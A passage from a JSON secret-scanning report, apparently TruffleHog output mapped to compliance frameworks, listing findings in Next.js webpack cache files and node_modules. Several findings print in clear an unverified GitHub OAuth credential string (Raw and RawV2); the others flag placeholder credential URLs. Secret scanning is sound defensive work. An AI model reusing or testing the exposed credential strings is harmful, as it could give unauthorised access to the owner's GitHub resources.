credentials are issued, managed, verified, revoked, and audited" }, { "function": "PROTECT", "category": "PR.DS", "subcategory": "PR.DS-1", "description": "Data-at-rest is protected" } ], "pciDss4_0": [ { "requirement": "8.3.2", "description": "Strong cryptography for authentication credentials", "priority": "CRITICAL" }, { "requirement": "8.2.1", "description": "Verify user identity before credential modification", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Credential Access", "technique": "T1552", "techniqueName": "Unsecured Credentials", "subtechnique": "T1552.001", "subtechniqueName": "Credentials in Files" }, { "tactic": "Initial Access", "technique": "T1078", "techniqueName": "Valid Accounts", "subtechnique": "", "subtechniqueName": "" } ] }, "priority": { "priority": 13.333333333333332, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 4, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "d6855b7ba77520b3", "ruleId": "GitHubOauth2", "severity": "MEDIUM", "tool": { "name": "trufflehog", "version": "unknown" }, "location": { "path": "/scan/apps/admin/.next/cache/webpack/server-development/3.pack.gz", "startLine": 0 }, "message": "52813b1d8ad9af510d85", "title": "GitHubOauth2 secret", "description": "Potential secret detected by TruffleHog", "remediation": "Rotate credentials and purge from history.", "references": [], "tags": [ "secrets", "unverified" ], "risk": { "cwe": [ "CWE-798" ], "confidence": "MEDIUM", "likelihood": "HIGH", "impact": "HIGH" }, "raw": { "SourceMetadata": { "Data": { "Filesystem": { "file": "/scan/apps/admin/.next/cache/webpack/server-development/3.pack.gz", "line": 10674 } } }, "SourceID": 1, "SourceType": 15, "SourceName": "trufflehog - filesystem", "DetectorType": 924, "DetectorName": "GitHubOauth2", "DetectorDescription": "GitHub OAuth2 credentials are used to authenticate and authorize applications to access GitHub's API on behalf of a user or organization. These credentials include a client ID and client secret, which can be used to obtain access tokens for accessing GitHub resources.", "DecoderName": "BASE64", "Verified": false, "VerificationFromCache": false, "Raw": "52813b1d8ad9af510d85", "RawV2": "52813b1d8ad9af510d852da024c3b4f9947a48517639de7560457cd4ec6c", "Redacted": "", "ExtraData": { "rotation_guide": "https://howtorotate.com/docs/tutorials/github/" }, "StructuredData": null }, "compliance": { "owaspTop10_2021": [ "A02:2021" ], "cweTop25_2024": [ { "id": "CWE-798", "rank": 18, "category": "Credentials" } ], "cisControlsV8_1": [ { "control": "3.11", "title": "Encrypt Sensitive Data at Rest", "implementationGroup": "IG1" }, { "control": "5.4", "title": "Restrict Administrator Privileges to Dedicated Administrator Accounts", "implementationGroup": "IG1" } ], "nistCsf2_0": [ { "function": "PROTECT", "category": "PR.AC", "subcategory": "PR.AC-1", "description": "Identities and credentials are issued, managed, verified, revoked, and audited" }, { "function": "PROTECT", "category": "PR.DS", "subcategory": "PR.DS-1", "description": "Data-at-rest is protected" } ], "pciDss4_0": [ { "requirement": "8.3.2", "description": "Strong cryptography for authentication credentials", "priority": "CRITICAL" }, { "requirement": "8.2.1", "description": "Verify user identity before credential modification", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Credential Access", "technique": "T1552", "techniqueName": "Unsecured Credentials", "subtechnique": "T1552.001", "subtechniqueName": "Credentials in Files" }, { "tactic": "Initial Access", "technique": "T1078", "techniqueName": "Valid Accounts", "subtechnique": "", "subtechniqueName": "" } ] }, "priority": { "priority": 13.333333333333332, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 4, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "437a1c93140bc172", "ruleId": "GitHubOauth2", "severity": "MEDIUM", "tool": { "name": "trufflehog", "version": "unknown" }, "location": { "path": "/scan/apps/admin/.next/cache/webpack/server-development/6.pack.gz", "startLine": 0 }, "message": "52813b1d8ad9af510d85", "title": "GitHubOauth2 secret", "description": "Potential secret detected by TruffleHog", "remediation": "Rotate credentials and purge from history.", "references": [], "tags": [ "secrets", "unverified" ], "risk": { "cwe": [ "CWE-798" ], "confidence": "MEDIUM", "likelihood": "HIGH", "impact": "HIGH" }, "raw": { "SourceMetadata": { "Data": { "Filesystem": { "file": "/scan/apps/admin/.next/cache/webpack/server-development/6.pack.gz", "line": 9955 } } }, "SourceID": 1, "SourceType": 15, "SourceName": "trufflehog - filesystem", "DetectorType": 924, "DetectorName": "GitHubOauth2", "DetectorDescription": "GitHub OAuth2 credentials are used to authenticate and authorize applications to access GitHub's API on behalf of a user or organization. These credentials include a client ID and client secret, which can be used to obtain access tokens for accessing GitHub resources.", "DecoderName": "PLAIN", "Verified": false, "VerificationFromCache": false, "Raw": "52813b1d8ad9af510d85", "RawV2": "52813b1d8ad9af510d852da024c3b4f9947a48517639de7560457cd4ec6c", "Redacted": "", "ExtraData": { "rotation_guide": "https://howtorotate.com/docs/tutorials/github/" }, "StructuredData": null }, "compliance": { "owaspTop10_2021": [ "A02:2021" ], "cweTop25_2024": [ { "id": "CWE-798", "rank": 18, "category": "Credentials" } ], "cisControlsV8_1": [ { "control": "3.11", "title": "Encrypt Sensitive Data at Rest", "implementationGroup": "IG1" }, { "control": "5.4", "title": "Restrict Administrator Privileges to Dedicated Administrator Accounts", "implementationGroup": "IG1" } ], "nistCsf2_0": [ { "function": "PROTECT", "category": "PR.AC", "subcategory": "PR.AC-1", "description": "Identities and credentials are issued, managed, verified, revoked, and audited" }, { "function": "PROTECT", "category": "PR.DS", "subcategory": "PR.DS-1", "description": "Data-at-rest is protected" } ], "pciDss4_0": [ { "requirement": "8.3.2", "description": "Strong cryptography for authentication credentials", "priority": "CRITICAL" }, { "requirement": "8.2.1", "description": "Verify user identity before credential modification", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Credential Access", "technique": "T1552", "techniqueName": "Unsecured Credentials", "subtechnique": "T1552.001", "subtechniqueName": "Credentials in Files" }, { "tactic": "Initial Access", "technique": "T1078", "techniqueName": "Valid Accounts", "subtechnique": "", "subtechniqueName": "" } ] }, "priority": { "priority": 13.333333333333332, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 4, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "7029ffbb2c18937d", "ruleId": "GitHubOauth2", "severity": "MEDIUM", "tool": { "name": "trufflehog", "version": "unknown" }, "location": { "path": "/scan/apps/dashboard/.next/cache/webpack/server-development/10.pack.gz", "startLine": 0 }, "message": "52813b1d8ad9af510d85", "title": "GitHubOauth2 secret", "description": "Potential secret detected by TruffleHog", "remediation": "Rotate credentials and purge from history.", "references": [], "tags": [ "secrets", "unverified" ], "risk": { "cwe": [ "CWE-798" ], "confidence": "MEDIUM", "likelihood": "HIGH", "impact": "HIGH" }, "raw": { "SourceMetadata": { "Data": { "Filesystem": { "file": "/scan/apps/dashboard/.next/cache/webpack/server-development/10.pack.gz", "line": 6254 } } }, "SourceID": 1, "SourceType": 15, "SourceName": "trufflehog - filesystem", "DetectorType": 924, "DetectorName": "GitHubOauth2", "DetectorDescription": "GitHub OAuth2 credentials are used to authenticate and authorize applications to access GitHub's API on behalf of a user or organization. These credentials include a client ID and client secret, which can be used to obtain access tokens for accessing GitHub resources.", "DecoderName": "BASE64", "Verified": false, "VerificationFromCache": true, "Raw": "52813b1d8ad9af510d85", "RawV2": "52813b1d8ad9af510d852da024c3b4f9947a48517639de7560457cd4ec6c", "Redacted": "", "ExtraData": { "rotation_guide": "https://howtorotate.com/docs/tutorials/github/" }, "StructuredData": null }, "compliance": { "owaspTop10_2021": [ "A02:2021" ], "cweTop25_2024": [ { "id": "CWE-798", "rank": 18, "category": "Credentials" } ], "cisControlsV8_1": [ { "control": "3.11", "title": "Encrypt Sensitive Data at Rest", "implementationGroup": "IG1" }, { "control": "5.4", "title": "Restrict Administrator Privileges to Dedicated Administrator Accounts", "implementationGroup": "IG1" } ], "nistCsf2_0": [ { "function": "PROTECT", "category": "PR.AC", "subcategory": "PR.AC-1", "description": "Identities and credentials are issued, managed, verified, revoked, and audited" }, { "function": "PROTECT", "category": "PR.DS", "subcategory": "PR.DS-1", "description": "Data-at-rest is protected" } ], "pciDss4_0": [ { "requirement": "8.3.2", "description": "Strong cryptography for authentication credentials", "priority": "CRITICAL" }, { "requirement": "8.2.1", "description": "Verify user identity before credential modification", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Credential Access", "technique": "T1552", "techniqueName": "Unsecured Credentials", "subtechnique": "T1552.001", "subtechniqueName": "Credentials in Files" }, { "tactic": "Initial Access", "technique": "T1078", "techniqueName": "Valid Accounts", "subtechnique": "", "subtechniqueName": "" } ] }, "priority": { "priority": 13.333333333333332, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 4, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "992176a363e3d8a9", "ruleId": "GitHubOauth2", "severity": "MEDIUM", "tool": { "name": "trufflehog", "version": "unknown" }, "location": { "path": "/scan/apps/dashboard/.next/cache/webpack/server-production/0.pack", "startLine": 0 }, "message": "52813b1d8ad9af510d85", "title": "GitHubOauth2 secret", "description": "Potential secret detected by TruffleHog", "remediation": "Rotate credentials and purge from history.", "references": [], "tags": [ "secrets", "unverified" ], "risk": { "cwe": [ "CWE-798" ], "confidence": "MEDIUM", "likelihood": "HIGH", "impact": "HIGH" }, "raw": { "SourceMetadata": { "Data": { "Filesystem": { "file": "/scan/apps/dashboard/.next/cache/webpack/server-production/0.pack", "line": 245909 } } }, "SourceID": 1, "SourceType": 15, "SourceName": "trufflehog - filesystem", "DetectorType": 924, "DetectorName": "GitHubOauth2", "DetectorDescription": "GitHub OAuth2 credentials are used to authenticate and authorize applications to access GitHub's API on behalf of a user or organization. These credentials include a client ID and client secret, which can be used to obtain access tokens for accessing GitHub resources.", "DecoderName": "PLAIN", "Verified": false, "VerificationFromCache": true, "Raw": "52813b1d8ad9af510d85", "RawV2": "52813b1d8ad9af510d852da024c3b4f9947a48517639de7560457cd4ec6c", "Redacted": "", "ExtraData": { "rotation_guide": "https://howtorotate.com/docs/tutorials/github/" }, "StructuredData": null }, "compliance": { "owaspTop10_2021": [ "A02:2021" ], "cweTop25_2024": [ { "id": "CWE-798", "rank": 18, "category": "Credentials" } ], "cisControlsV8_1": [ { "control": "3.11", "title": "Encrypt Sensitive Data at Rest", "implementationGroup": "IG1" }, { "control": "5.4", "title": "Restrict Administrator Privileges to Dedicated Administrator Accounts", "implementationGroup": "IG1" } ], "nistCsf2_0": [ { "function": "PROTECT", "category": "PR.AC", "subcategory": "PR.AC-1", "description": "Identities and credentials are issued, managed, verified, revoked, and audited" }, { "function": "PROTECT", "category": "PR.DS", "subcategory": "PR.DS-1", "description": "Data-at-rest is protected" } ], "pciDss4_0": [ { "requirement": "8.3.2", "description": "Strong cryptography for authentication credentials", "priority": "CRITICAL" }, { "requirement": "8.2.1", "description": "Verify user identity before credential modification", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Credential Access", "technique": "T1552", "techniqueName": "Unsecured Credentials", "subtechnique": "T1552.001", "subtechniqueName": "Credentials in Files" }, { "tactic": "Initial Access", "technique": "T1078", "techniqueName": "Valid Accounts", "subtechnique": "", "subtechniqueName": "" } ] }, "priority": { "priority": 13.333333333333332, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 4, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "c1bd932c91cd4cda", "ruleId": "URI", "severity": "MEDIUM", "tool": { "name": "trufflehog", "version": "unknown" }, "location": { "path": "/scan/node_modules/@types/node/http.d.ts", "startLine": 0 }, "message": "http://abc:xyz@example.com", "title": "URI secret", "description": "Potential secret detected by TruffleHog", "remediation": "Rotate credentials and purge from history.", "references": [], "tags": [ "secrets", "unverified" ], "risk": { "cwe": [ "CWE-798" ], "confidence": "MEDIUM", "likelihood": "HIGH", "impact": "HIGH" }, "raw": { "SourceMetadata": { "Data": { "Filesystem": { "file": "/scan/node_modules/@types/node/http.d.ts", "line": 1790 } } }, "SourceID": 1, "SourceType": 15, "SourceName": "trufflehog - filesystem", "DetectorType": 17, "DetectorName": "URI", "DetectorDescription": "This detector identifies URLs with embedded credentials, which can be used to access web resources without explicit user interaction.", "DecoderName": "PLAIN", "Verified": false, "VerificationFromCache": false, "Raw": "http://abc:xyz@example.com", "RawV2": "http://abc:xyz@example.com", "Redacted": "http://abc:********@example.com", "ExtraData": null, "StructuredData": null }, "compliance": { "owaspTop10_2021": [ "A02:2021" ], "cweTop25_2024": [ { "id": "CWE-798", "rank": 18, "category": "Credentials" } ], "cisControlsV8_1": [ { "control": "3.11", "title": "Encrypt Sensitive Data at Rest", "implementationGroup": "IG1" }, { "control": "5.4", "title": "Restrict Administrator Privileges to Dedicated Administrator Accounts", "implementationGroup": "IG1" } ], "nistCsf2_0": [ { "function": "PROTECT", "category": "PR.AC", "subcategory": "PR.AC-1", "description": "Identities and credentials are issued, managed, verified, revoked, and audited" }, { "function": "PROTECT", "category": "PR.DS", "subcategory": "PR.DS-1", "description": "Data-at-rest is protected" } ], "pciDss4_0": [ { "requirement": "8.3.2", "description": "Strong cryptography for authentication credentials", "priority": "CRITICAL" }, { "requirement": "8.2.1", "description": "Verify user identity before credential modification", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Credential Access", "technique": "T1552", "techniqueName": "Unsecured Credentials", "subtechnique": "T1552.001", "subtechniqueName": "Credentials in Files" }, { "tactic": "Initial Access", "technique": "T1078", "techniqueName": "Valid Accounts", "subtechnique": "", "subtechniqueName": "" } ] }, "priority": { "priority": 13.333333333333332, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 4, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "65c35953dedc7b57", "ruleId": "URI", "severity": "MEDIUM", "tool": { "name": "trufflehog", "version": "unknown" }, "location": { "path": "/scan/node_modules/@types/node/https.d.ts", "startLine": 0 }, "message": "https://abc:xyz@example.com", "title": "URI secret", "description": "Potential secret detected by TruffleHog", "remediation": "Rotate credentials and purge from history.", "references": [], "tags": [ "secrets", "unverified" ], "risk": { "cwe": [ "CWE-798" ], "confidence": "MEDIUM", "likelihood": "HIGH", "impact": "HIGH" }, "raw": { "SourceMetadata": { "Data": { "Filesystem": { "file": "/scan/node_modules/@types/node/https.d.ts", "line": 428 } } }, "SourceID": 1, "SourceType": 15, "SourceName": "trufflehog - filesystem", "DetectorType": 17, "DetectorName": "URI", "DetectorDescription": "This detector identifies URLs with embedded credentials, which can be used to access web resources without explicit user interaction.", "DecoderName": "PLAIN", "Verified": false, "VerificationFromCache": false, "Raw": "https://abc:xyz@example.com", "RawV2": "https://abc:xyz@example.com", "Redacted": "https://abc:********@example.com", "ExtraData": null, "StructuredData": null }, "compliance": { "owaspTop10_2021": [ "A02:2021" ], "cweTop25_2024": [ { "id": "CWE-798", "rank": 18, "category": "Credentials" } ], "cisControlsV8_1": [ { "control": "3.11", "title": "Encrypt Sensitive Data at Rest", "implementationGroup": "IG1" }, { "control": "5.4", "title": "Restrict Administrator Privileges to Dedicated Administrator Accounts", "implementationGroup": "IG1" } ], "nistCsf2_0": [ { "function": "PROTECT", "category": "PR.AC", "subcategory": "PR.AC-1", "description": "Identities and credentials are issued, managed, verified, revoked, and audited" }, { "function": "PROTECT", "category": "PR.DS", "subcategory": "PR.DS-1", "description": "Data-at-rest is protected" } ], "pciDss4_0": [ { "requirement": "8.3.2", "description": "Strong cryptography for authentication credentials", "priority": "CRITICAL" }, { "requirement": "8.2.1", "description": "Verify user identity before credential modification", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Credential Access", "technique": "T1552", "techniqueName": "Unsecured Credentials", "subtechnique": "T1552.001", "subtechniqueName": "Credentials in Files" }, { "tactic": "Initial Access", "technique": "T1078", "techniqueName": "Valid Accounts", "subtechnique": "", "subtechniqueName": "" } ] }, "priority": { "priority": 13.333333333333332, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 4, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "f081eac965f118df", "ruleId": "URI", "severity": "MEDIUM", "tool": { "name": "trufflehog", "version": "unknown" }, "location": { "path": "/scan/node_modules/@types/node/url.d.ts", "startLine": 0 }, "message": "https://123:xyz@example.com", "title": "URI secret", "description": "Potential secret detected by TruffleHog", "remediation": "Rotate credentials and purge from history.", "references": [], "tags": [ "secrets", "unverified" ], "risk": { "cwe": [ "CWE-798" ], "confidence": "MEDIUM", "likelihood": "HIGH", "impact": "HIGH" }, "raw": { "SourceMetadata": { "Data": { "Filesystem": { "file": "/scan/node_modules/@types/node/url.d.ts", "line": 722 } } }, "SourceID": 1, "SourceType": 15, "SourceName": "trufflehog - filesystem", "DetectorType": 17, "DetectorName": "URI", "DetectorDescription": "This detector identifies URLs with embedded credentials, which can be used to access web resources without explicit user interaction.", "DecoderName": "PLAIN", "Verified": false, "VerificationFromCache": false, "Raw": "https://123:xyz@example.com", "RawV2": "https://123:xyz@example.com", "Redacted": "https://123:********@example.com", "ExtraData": null, "StructuredData": null }, "compliance": { "owaspTop10_2021": [ "A02:2021" ], "cweTop25_2024": [ { "id": "CWE-798", "rank": 18, "category": "Credentials" } ], "cisControlsV8_1": [ { "control": "3.11", "title": "Encrypt Sensitive Data at Rest", "implementationGroup": "IG1" }, { "control": "5.4", "title": "Restrict Administrator Privileges to Dedicated Administrator Accounts", "implementationGroup": "IG1" } ], "nistCsf2_0": [ { "function": "PROTECT", "category": "PR.AC", "subcategory": "PR.AC-1", "description": "Identities and credentials are issued, managed, verified, revoked, and audited" }, { "function": "PROTECT", "category": "PR.DS", "subcategory": "PR.DS-1", "description": "Data-at-rest is protected" } ], "pciDss4_0": [ { "requirement": "8.3.2", "description": "Strong cryptography for authentication credentials", "priority": "CRITICAL" }, { "requirement": "8.2.1", "description": "Verify user identity before credential modification", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Credential Access", "technique": "T1552", "techniqueName": "Unsecured Credentials", "subtechnique": "T1552.001", "subtechniqueName": "Credentials in Files" }, { "tactic": "Initial Access", "technique": "T1078", "techniqueName": "Valid Accounts", "subtechnique": "", "subtechniqueName": "" } ] }, "priority": { "priority": 13.333333333333332, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 4, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "a18230c14354e278", "ruleId": "URI", "severity": "MEDIUM", "tool": { "name": "trufflehog", "version": "unknown" }, "location": { "path": "/scan/node_modules/@types/node/url.d.ts", "startLine": 0 }, "message": "https://abc:xyz@example.com", "title": "URI secret", "description": "Potential secret detected by TruffleHog", "remediation": "Rotate credentials and purge from history.", "references": [], "tags": [ "secrets", "unverified" ], "risk": { "cwe": [ "CWE-798" ], "confidence": "MEDIUM", "likelihood": "HIGH", "impact": "HIGH" }, "raw": { "SourceMetadata": { "Data": { "Filesystem": { "file": "/scan/node_modules/@types/node/url.d.ts", "line": 716 } } }, "SourceID": 1, "SourceType": 15, "SourceName": "trufflehog - filesystem", "DetectorType": 17, "DetectorName": "URI", "DetectorDescription": "This detector identifies URLs with embedded credentials, which can be used to access web resources without explicit user interaction.", "DecoderName": "PLAIN", "Verified": false, "VerificationFromCache": false, "Raw": "https://abc:xyz@example.com", "RawV2": "https://abc:xyz@example.com", "Redacted": "https://abc:********@example.com", "ExtraData": null, "StructuredData": null }, "compliance": { "owaspTop10_2021": [ "A02:2021" ], "cweTop25_2024": [ { "id": "CWE-798", "rank": 18, "category": "Credentials" } ], "cisControlsV8_1": [ { "control": "3.11", "title": "Encrypt Sensitive Data at Rest", "implementationGroup": "IG1" }, { "control": "5.4", "title": "Restrict Administrator Privileges to Dedicated Administrator Accounts", "implementationGroup": "IG1" } ], "nistCsf2_0": [ { "function": "PROTECT", "category": "PR.AC", "subcategory": "PR.AC-1", "description": "Identities and credentials are issued, managed, verified, revoked, and audited" }, { "function": "PROTECT", "category": "PR.DS", "subcategory": "PR.DS-1", "description": "Data-at-rest is protected" } ], "pciDss4_0": [ { "requirement": "8.3.2", "description": "Strong cryptography for authentication credentials", "priority": "CRITICAL" }, { "requirement": "8.2.1", "description": "Verify user identity before credential modification", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Credential Access", "technique": "T1552", "techniqueName": "Unsecured Credentials", "subtechnique": "T1552.001", "subtechniqueName": "Credentials in Files" }, { "tactic": "Initial Access", "technique": "T1078", "techniqueName": "Valid Accounts", "subtechnique": "", "subtechniqueName": "" } ] }, "priority": { "priority": 13.333333333333332, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 4, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "f03f52d67f2ae961", "ruleId": "URI", "severity": "MEDIUM", "tool": { "name": "trufflehog", "version": "unknown" }, "location": { "path": "/scan/node_modules/@types/node/url.d.ts", "startLine": 0 }, "message": "https://abc:123@example.com", "title": "URI secret", "description": "Potential secret detected by TruffleHog", "remediation": "Rotate credentials and purge from history.", "references": [], "tags": [ "secrets", "unverified" ], "risk": { "cwe": [ "CWE-798" ], "confidence": "MEDIUM", "likelihood": "HIGH", "impact": "HIGH" }, "raw": { "SourceMetadata": { "Data": { "Filesystem": { "file": "/scan/node_modules/@types/node/url.d.ts", "line": 557 } } }, "SourceID": 1, "SourceType": 15, "SourceName": "trufflehog - filesystem", "DetectorType": 17, "DetectorName": "URI", "DetectorDescription": "This detector identifies URLs with embedded credentials, which can be used to access web resources without explicit user interaction.", "DecoderName": "PLAIN", "Verified": false, "VerificationFromCache": false, "Raw": "https://abc:123@example.com", "RawV2": "https://abc:123@example.com", "Redacted": "https://abc:********@example.com", "ExtraData": null, "StructuredData": null }, "compliance": { "owaspTop10_2021": [ "A02:2021" ], "cweTop25_2024": [ { "id": "CWE-798", "rank": 18, "category": "Credentials" } ], "cisControlsV8_1": [ { "control": "3.11", "title": "Encrypt Sensitive Data at Rest", "implementationGroup": "IG1" }, { "control": "5.4", "title": "Restrict Administrator Privileges to Dedicated Administrator Accounts", "implementationGroup": "IG1" } ], "nistCsf2_0": [ { "function": "PROTECT", "category": "PR.AC", "subcategory": "PR.AC-1", "description": "Identities and credentials are issued, managed, verified, revoked, and audited" }, { "function": "PROTECT", "category": "PR.DS", "subcategory": "PR.DS-1", "description": "Data-at-rest is protected" } ], "pciDss4_0": [ { "requirement": "8.3.2", "description": "Strong cryptography for authentication credentials", "priority": "CRITICAL" }, { "requirement": "8.2.1", "description": "Verify user identity before credential modification", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Credential Access", "technique": "T1552", "techniqueName": "Unsecured Credentials", "subtechnique": "T1552.001", "subtechniqueName": "Credentials in Files" }, { "tactic": "Initial Access", "technique": "T1078", "techniqueName": "Valid Accounts", "subtechnique": "", "subtechniqueName": "" } ] }, "priority": { "priority": 13.333333333333332, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 4, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "71285c8155080cef", "ruleId": "URI", "severity": "MEDIUM", "tool": { "name": "trufflehog", "version": "unknown" }, "location": { "path": "/scan/node_modules/faye-websocket/README.md", "startLine": 0 }, "message": "http://username:password@proxy.example.com", "title": "URI secret", "description": "Potential secret detected by TruffleHog", "remediation": "Rotate credentials and purge from history.", "references": [], "tags": [ "secrets", "unverified" ], "risk": { "cwe": [ "CWE-798" ], "confidence": "MEDIUM", "likelihood": "HIGH", "impact": "HIGH" }, "raw": { "SourceMetadata": { "Data": { "Filesystem": { "file": "/scan/node_modules/faye-websocket/README.md", "line": 122 } } }, "SourceID": 1, "SourceType": 15, "SourceName": "trufflehog - filesystem", "DetectorType": 17, "DetectorName": "URI", "DetectorDescription": "This detector identifies URLs with embedded credentials, which can be used to access web resources without explicit user interaction.", "DecoderName": "PLAIN", "Verified": false, "VerificationError": "lookup proxy.example.com on 192.168.65.7:53: no such host", "VerificationFromCache": false, "Raw": "http://username:password@proxy.example.com", "RawV2": "http://username:password@proxy.example.com", "Redacted": "http://username:********@proxy.example.com", "ExtraData": null, "StructuredData": null }, "compliance": { "owaspTop10_2021": [ "A02:2021" ], "cweTop25_2024": [ { "id": "CWE-798", "rank": 18, "category": "Credentials" } ], "cisControlsV8_1": [ { "control": "3.11", "title": "Encrypt Sensitive Data at Rest", "implementationGroup": "IG1" }, { "control": "5.4", "title": "Restrict Administrator Privileges to Dedicated Administrator Accounts", "implementationGroup": "IG1" } ], "nistCsf2_0": [ { "function": "PROTECT", "category": "PR.AC", "subcategory": "PR.AC-1", "description": "Identities and credentials are issued, managed, verified, revoked, and audited" }, { "function": "PROTECT", "category": "PR.DS", "subcategory": "PR.DS-1", "description": "Data-at-rest is protected" } ], "pciDss4_0": [ { "requirement": "8.3.2", "description": "Strong cryptography for authentication credentials", "priority": "CRITICAL" }, { "requirement": "8.2.1", "description": "Verify user identity before credential modification", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Credential Access", "technique": "T1552", "techniqueName": "Unsecured Credentials", "subtechnique": "T1552.001", "subtechniqueName": "Credentials in Files" }, { "tactic": "Initial Access", "technique": "T1078", "techniqueName": "Valid Accounts", "subtechnique": "", "subtechniqueName": "" } ] }, "priority": { "priority": 13.333333333333332, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 4, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "cf9d5ac0f2fa1e76", "ruleId": "URI", "severity": "MEDIUM", "tool": { "name": "trufflehog", "version": "unknown" }, "location": { "path": "/scan/node_modules/firebase-admin/node_modules/@types/node/https.d.ts", "startLine": 0 }, "message": "https://abc:xyz@example.com", "title": "URI secret", "description": "Potential secret detected by TruffleHog", "remediation": "Rotate credentials and purge from history.", "references": [], "tags": [ "secrets", "unverified" ], "risk": { "cwe": [ "CWE-798" ], "confidence": "MEDIUM", "likelihood": "HIGH", "impact": "HIGH" }, "raw": { "SourceMetadata": { "Data": { "Filesystem": { "file": "/scan/node_modules/firebase-admin/node_modules/@types/node/https.d.ts", "line": 429 } } }, "SourceID": 1, "SourceType": 15, "SourceName": "trufflehog - filesystem", "DetectorType": 17, "DetectorName": "URI", "DetectorDescription": "This detector identifies URLs with embedded credentials, which can be used to access web resources without explicit user interaction.", "DecoderName": "PLAIN", "Verified": false, "VerificationFromCache": true, "Raw": "https://abc:xyz@example.com", "RawV2": "https://abc:xyz@example.com", "Redacted": "https://abc:********@example.com", "ExtraData": null, "StructuredData": null }, "compliance": { "owaspTop10_2021": [ "A02:2021" ], "cweTop25_2024": [ { "id": "CWE-798", "rank": 18, "category": "Credentials" } ], "cisControlsV8_1": [ { "control": "3.11", "title": "Encrypt Sensitive Data at Rest", "implementationGroup": "IG1" }, { "control": "5.4", "title": "Restrict Administrator Privileges to Dedicated Administrator Accounts", "implementationGroup": "IG1" } ], "nistCsf2_0": [ { "function": "PROTECT", "category": "PR.AC", "subcategory": "PR.AC-1", "description": "Identities and credentials are issued, managed, verified, revoked, and audited" }, { "function": "PROTECT", "category": "PR.DS", "subcategory": "PR.DS-1", "description": "Data-at-rest is protected" } ], "pciDss4_0": [ { "requirement": "8.3.2", "description": "Strong cryptography for authentication credentials", "priority": "CRITICAL" }, { "requirement": "8.2.1", "description": "Verify user identity before credential modification", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Credential Access", "technique": "T1552", "techniqueName": "Unsecured Credentials", "subtechnique": "T1552.001", "subtechniqueName": "Credentials in Files" }, { "tactic": "Initial Access", "technique": "T1078", "techniqueName": "Valid Accounts", "subtechnique": "", "subtechniqueName": "" } ] }, "priority": { "priority": 13.333333333333332, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 4, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "40e557d25e059317", "ruleId": "URI", "severity": "MEDIUM", "tool": { "name": "trufflehog", "version": "unknown" }, "location": { "path": "/scan/node_modules/firebase-admin/node_modules/@types/node/http.d.ts", "startLine": 0 }, "message": "http://abc:xyz@example.com", "title": "URI secret", "description": "Potential secret detected by TruffleHog", "remediation": "Rotate credentials and purge from history.", "references": [], "tags": [ "secrets", "unverified" ], "risk": { "cwe": [ "CWE-798" ], "confidence": "MEDIUM", "likelihood": "HIGH", "impact": "HIGH" }, "raw": { "SourceMetadata": { "Data": { "Filesystem": { "file": "/scan/node_modules/firebase-admin/node_modules/@types/node/http.d.ts", "line": 1817 } } }, "SourceID": 1, "SourceType": 15, "SourceName": "trufflehog - filesystem", "DetectorType": 17, "DetectorName": "URI", "DetectorDescription": "This detector identifies URLs with embedded credentials, which can be used to access web resources without explicit user interaction.", "DecoderName": "PLAIN", "Verified": false, "VerificationFromCache": true, "Raw": "http://abc:xyz@example.com", "RawV2": "http://abc:xyz@example.com", "Redacted": "http://abc:********@example.com", "ExtraData": null, "StructuredData": null }, "compliance": { "owaspTop10_2021": [ "A02:2021" ], "cweTop25_2024": [ { "id": "CWE-798", "rank": 